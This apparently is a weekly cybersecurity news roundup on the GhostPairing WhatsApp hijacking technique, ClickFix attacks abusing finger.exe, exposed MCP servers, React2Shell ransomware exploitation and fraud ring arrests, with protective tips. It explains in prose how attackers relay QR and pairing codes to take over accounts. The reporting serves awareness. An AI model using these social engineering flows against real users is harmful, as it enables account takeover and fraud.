WhatsApp Account Hijacking Scheme Headlines Week of Cybersecurity Threats

A sophisticated social engineering technique dubbed "GhostPairing" that hijacks WhatsApp accounts leads this week's roundup of cybersecurity threats, alongside the discovery of exposed AI servers and exploitation of the React2Shell vulnerability in ransomware attacks.

The threat landscape continues to evolve at an accelerated pace as attackers refine old techniques and discover new vulnerabilities in familiar systems. From international scam rings to AI-driven reconnaissance of industrial control systems, this week's developments highlight the fluid nature of cyber threats.

Global Criminal Operations Disrupted

International fraud ring dismantled in Ukraine

Authorities from multiple European countries, including the Czech Republic, Latvia, Lithuania, and Ukraine, have dismantled a criminal network operating call centers that defrauded more than 400 victims across Europe of approximately €10 million ($11.7 million).

The operation targeted call centers in Dnipro, Ivano-Frankivsk, and Kyiv that employed around 100 people who impersonated police officers and bank officials to trick victims into transferring large sums of money or downloading remote access software. Employees received up to 7% of stolen funds as commission, with additional incentives like cars or apartments for those obtaining more than €100,000.

The December 9 operation resulted in 12 arrests and the seizure of cash, 21 vehicles, and various weapons.

India disrupts phishing SMS factory

India's Central Bureau of Investigation (CBI) has dismantled a large-scale cyber fraud operation that sent phishing messages nationwide promoting fake schemes, digital arrest scams, and fraudulent investment opportunities.

The gang, operating from the National Capital Region and Chandigarh area, had acquired approximately 21,000 SIM cards in violation of regulations. These cards were controlled through an online platform to send bulk messages targeting Indian citizens, with even foreign cybercriminals utilizing the service.

"The messages offered fake loans, investment opportunities, and other financial benefits, with the aim of stealing personal and banking details of innocent people," according to the CBI.

In a related operation, the agency charged 17 individuals, including four foreign nationals, and 58 companies involved in a transnational cyber fraud network using Google advertisements, bulk SMS campaigns, and cloud infrastructure to conceal the identities of the perpetrators.

Novel Attack Techniques Emerge

GhostPairing attack targets WhatsApp accounts

A new social engineering technique called GhostPairing is being used to hijack WhatsApp accounts. The attack begins with messages sent from already compromised accounts containing links to what appears to be Facebook content previews.

When victims click these links, they're directed to a fake Facebook viewer page that asks them to verify their identity by scanning a QR code. This code actually links an attacker's browser to the victim's WhatsApp account, granting unauthorized access.

"To abuse this flow, an attacker would open WhatsApp Web in their own browser, capture the QR code shown there, and embed it into the fake Facebook viewer page," explained Gen Digital researchers.

Alternatively, victims are instructed to enter their phone number, which is forwarded to WhatsApp's legitimate "link device via phone number" feature. The generated pairing code is then relayed back to the fraudulent page with instructions for the victim to enter it.

The earliest instances of this attack were detected in Czechia. Users can check for signs of compromise by navigating to Settings > Linked Devices in WhatsApp.

ClickFix attacks leverage legacy Windows tool

A new wave of ClickFix attacks has been using fake CAPTCHA checks to trick users into pasting commands into the Windows Run dialog, which executes the finger.exe tool to retrieve malicious PowerShell code.

The finger command, originally designed to look up information about users on Unix and Linux systems, has been repurposed by attackers to deploy malware. The attacks have been attributed to threat actors tracked as KongTuke and SmartApeSG.

In similar attacks detected by Point Wild, fake browser notifications prompt users to click "How to fix" or copy-paste a PowerShell command that leads to the deployment of DarkGate malware through a malicious HTA file. Organizations seeking protection against these types of threats should consider implementing robust malware removal and prevention solutions as part of their security strategy.

Exposed Infrastructure and Vulnerabilities

Approximately 1,000 MCP servers found exposed

Research from Bitsight has identified roughly 1,000 Model Context Protocol (MCP) servers exposed on the internet without authorization, potentially leaking sensitive data. Some of these exposed servers could allow management of Kubernetes clusters, access to CRM tools, sending of WhatsApp messages, and even remote code execution.

"While Anthropic authored the MCP specification, it's not their job to enforce how every server handles authorization," Bitsight noted. "Because authorization is optional, it's easy to skip it when moving from a demo to a real-world deployment, potentially exposing sensitive tools or data."

To mitigate risks, organizations should avoid exposing MCP servers unnecessarily and implement OAuth protections for authorization. This issue highlights significant security risks and challenges of artificial intelligence in business environments, particularly when deploying new AI technologies without adequate security controls.

React2Shell vulnerability exploited in ransomware attacks

The React2Shell vulnerability (CVE-2025-55182) continues to be widely exploited, with security firm S-RM reporting its use as an initial access vector in a Weaxor ransomware attack on December 5.

"This marks a shift from previously reported exploitation," S-RM stated. "It indicates threat actors whose modus operandi involves cyber extortion are also successfully exploiting this vulnerability, albeit on a much smaller scale and likely in an automated fashion."

Weaxor, believed to be a rebrand of Mallox ransomware, was deployed and executed within less than a minute of initial access, suggesting an automated campaign. According to Palo Alto Networks Unit 42, more than 60 organizations have been impacted by incidents exploiting this vulnerability, while Microsoft reported "several hundred machines across a diverse set of organizations" compromised through React2Shell.

The React2Shell exploit has become increasingly prevalent in cybersecurity incidents, requiring immediate attention from organizations that use React-based applications in their technology stack.

How to protect yourself

These developments underscore the need for enhanced security measures across organizations and individuals alike. To protect yourself:

1. Regularly verify linked devices in your messaging apps like WhatsApp to identify unauthorized access
2. Be cautious of links sent even from trusted contacts, as their accounts may be compromised
3. Never copy-paste commands from unknown sources into command prompts or run dialogs
4. Ensure all internet-facing servers have proper authorization mechanisms in place
5. Keep systems and applications updated with the latest security patches to prevent exploitation of vulnerabilities like React2Shell
6. Enable two-factor authentication (2FA) on all accounts that support it to add an extra layer of security beyond passwords
7. Educate employees about social engineering tactics and how to recognize phishing attempts

Immediate action is required: Organizations should prioritize patching systems vulnerable to React2Shell and conduct security audits to ensure MCP servers are properly secured behind authentication mechanisms.

The rapid evolution of cyber threats requires constant vigilance and a proactive approach to security. By staying informed about the latest attack techniques and implementing appropriate safeguards, you can significantly reduce your risk of falling victim to these sophisticated schemes.

For comprehensive guidance on protecting against the latest cybersecurity threats, the National Cybersecurity Alliance offers resources for both individuals and organizations to improve their security posture.